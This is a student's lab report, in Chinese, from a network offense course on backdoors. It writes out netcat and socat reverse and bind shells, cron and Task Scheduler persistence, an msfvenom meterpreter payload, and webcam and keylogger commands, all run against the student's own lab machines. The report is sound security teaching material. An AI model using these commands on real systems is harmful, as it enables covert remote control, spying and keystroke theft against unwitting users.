2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践

1 后门原理与实验内容

1.1 后门原理

-后门就是不经过正常认证流程而访问系统的通道。

  • 哪里有后门呢?

    • 编译器留后门
    • 操作系统留后门
    • 最常见的当然还是应用程序中留后门
    • 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。

1.2 实验内容

任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)

任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

2 基础问题回答

  • 问:例举你能想到的一个后门进入到你系统中的可能方式?

问:例举你知道的后门如何启动起来(win及linux)的方式?
win:修改注册表、设置为开机自启动、诱导用户点击从而执行等等。
Linux:可以通过crontab功能将木马设为定时启动,也可以通过对正常软件的绑定注入shellcode达到开启后门的目的。
问:Meterpreter有哪些给你映像深刻的功能?
这次试验给我留下深刻印象的主要有获取目标主机音频、摄像头、击键记录等内容。除此之外还有植入后门实施远程控制、metsvc后渗透攻击模块等等。
问:如何发现自己有系统有没有被安装后门?
可以检测网络连接,查看是否有IP与本机建立连接;安装专门的杀毒软件,实时防护,并定期检测电脑安全情况;查看任务计划程序、开机自启动项中是否有可疑程序,等等。

(1) 例举你能想到的一个后门进入到你系统中的可能方式?

  • 在访问某些网站的时候,点开图片可能就会内置后门,在用户不易察觉的情况下,下载木马病毒安装在电脑中,威胁我们的主机的安全。

(2) 例举你知道的后门如何启动起来(win及linux)的方式?

  • win中可以修改系统注册表,或者隐藏后缀名诱使用户点开。
  • linux中可以通过crontab功能将木马设为定时启动。

(3) Meterpreter有哪些给你映像深刻的功能?

(4)如何发现自己有系统有没有被安装后门?

3 实验步骤

3.1 Windows获得Linux Shell

  • win10中输入ipconfig查看IP为 172.30.5.45。

  • 在win10中输入ncat.exe -l -p 5209监听win10的5209端口。
  • 在kali中输入nc 172.30.5.45 5209 -e /bin/sh反弹连接win10的5209端口。
  • 在win10中成功获得kali的shell。

3.2 Linux获得Windows Shell

  • kali中输入ifconfig查看IP为 192.168.25.132.

  • 在kali中输入nc -l -p 5209监听kali的5209端口。
  • 在win10中输入ncat.exe -e cmd.exe 192.168.25.132 5209反弹连接kali的5209端口。
  • 在kali中成功获得win10的shell。

3.3 使用netcat获取主机操作Shell,cron启动

  • 在win10中输入ncat.exe -l -p 5209监听win10的5209端口。
  • 在kali中输入crontab -e编辑一条定时任务。
  • 我当时的时间是11:35为了尽快看到效果,我编辑的指令是37 * * * * /bin/netcat 172.30.5.45 5209 -e /bin/sh表示每个小时的第37分钟反弹连接Win10的5209端口。
  • 当时间到了11点37时,成功获得Kali的shell,可以输入指令。

3.4 使用socat获取主机操作Shell

  • win10中右击windows图标,选择“计算机管理”。
  • 在“任务计划程序”创建任务,填写任务名称,并新建一个触发器。

  • 在操作->程序或脚本中选择socat.exe文件的路径,在添加参数一栏填写tcp-listen:5209 exec:cmd.exe,pty,stderr,作用是把cmd.exe绑定到端口5209,同时把cmd.exe的stderr重定向到stdout上。

  • 创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行。

  • 同时在Kali中输入指令socat - tcp:172.30.5.45:5209成功获得了一个cmd shell

3.5 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 在kali输入指令
    msfvenom -p windows/meterpreter/reverse_tcp LHOST= 192.168.25.132 LPORT=5209 -f exe > 20165209_backdoor.exe生成后门程序
  • 在Win10中输入ncat.exe -lv 5209 > 20165209_backdoor.exe进入接收文件模式
  • 在kali中输入nc 172.30.5.45 5209 < 20165209_backdoor.exeIP为win10的IP

  • 在Kali中打开一个终端,输入msfconsole进入msf控制台
  • 输入use exploit/multi/handler使用监听模块,设置payload
  • 输入set payload windows/meterpreter/reverse_tcp使用和生成后门程序时相同的payload
  • 输入set LHOST 192.168.25.132
  • 输入set LPORT 5215
  • 输入show options进行查看,显示设置的ip地址和端口号

  • 输入exploit开始监听
  • win10中运行后门程序20165209_backdoor.exe
  • 此时kali获得win10的连接,并且得到了远程控制的shell

3.6 使用MSF meterpreter生成获取目标主机摄像头、击键记录等内容

  • 重复3.5的操作直至exploit
  • 输入webcam_snap使用摄像头进行拍照

  • 输入keyscan_start开始记录击键的过程,输入keyscan_dump读取击键的记录

实验总结与体会

实验做了很长时间,真的很考验心态,但是实验还是很有意思的,发现原来获取一台电脑的shell其实并没有想象那么难,但同时也让我对网络有点害怕,还是要把摄像头关好的,定期杀毒,补漏洞很有必要。

2018-2019-2 20165209 《网络对抗技术》Exp2:后门原理与实践的更多相关文章

  1. 2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践

    2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务 ...

  2. 20155326刘美岑 《网络对抗》Exp2 后门原理与实践

    20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  3. 20155320《网络对抗》Exp2 后门原理与实践

    20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, ...

  4. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  5. 20155208徐子涵《网络对抗》Exp2 后门原理与实践

    20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们 ...

  6. 20145236《网络对抗》Exp2 后门原理与实践

    20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows ...

  7. 20155202 张旭《网络对抗》Exp2 后门原理与实践

    20155202 张旭<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 ...

  8. 20155218《网络对抗》Exp2 后门原理与实践

    20155218<网络对抗>Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用nc ...

  9. 20155227《网络对抗》Exp2 后门原理与实践

    20155227<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站下载软件时,后门很可能被捆绑在软件中. 攻击者利用欺 ...

  10. 20155232《网络对抗》Exp2 后门原理与实践

    20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(wi ...

随机推荐

  1. 美团开源 SQL 优化工具 SQLAdvisor

    https://www.oschina.net/news/82725/sqladvisor-opensource https://github.com/Meituan-Dianping/SQLAdvi ...

  2. OpenCV学习笔记之课后习题练习3-5

    OpenCV学习笔记之课后习题练习2-5 练习使用感兴趣区域(ROI).创建一个210*210的单通道图像并将其归0.在图像中使用ROI和cvSet()建立一个增长如金字塔状的数组. 参考博文:www ...

  3. What is Gensim?

    Gensim是一款开源的第三方Python工具包,用于从原始的非结构化的文本中,无监督地学习到文本隐层的主题向量表达.它支持包括TF-IDF,LSA,LDA,和word2vec在内的多种主题模型算法, ...

  4. AmazonOrder xml web语义化

    XML Processing Modules — Python 3.7.1 documentation https://docs.python.org/3.7/library/xml.html#xml ...

  5. 《Nginx - 变量》- log_format/核心变量

    一:log_format - 概述 - log_format 用于管理 Nginx 的详细信息,日志管理等信息,很多都是基于这个来实现. - 可配置参数 $remote_addr 客户端地址 $rem ...

  6. 【python-opencv】16-图像平滑

    [微语]“你以后向成为什么样的人?”    “什么意思,难道我以后就不能成为我自己吗?”    ----<阿甘正传> 补充知识点:如何理解图像的低频是轮廓,高频是噪声和细节 图像的频率:灰 ...

  7. 【Pyton】【小甲鱼】类和对象

    一.类 定义一个类,例子如下: class Turtle: #定义一个名为Turtle的类,Python中类型约定以大写字母开头 #属性 color='green' weight=10 legs=4 ...

  8. Python安装sqlite3

    今天使用PYthon时,发现错误 ImportError: No module named sqlite 这是因为缺少 SQLITE3的缘故. 下面分享一下解决此问题的方法步骤: 1. 查看是Pyth ...

  9. CentOS忘记普通用户密码解决办法

    普通用户忘记密码 1.使用root用户登录系统,找到/etc/shadow文件. 2.找到用户名开头的那一行,例如我的用户名为pds,,以冒号为分割符,红色部分是密码加密部分 pds:$1$Civop ...

  10. BFS广搜题目(转载)

    BFS广搜题目有时间一个个做下来 2009-12-29 15:09 1574人阅读 评论(1) 收藏 举报 图形graphc优化存储游戏 有时间要去做做这些题目,所以从他人空间copy过来了,谢谢那位 ...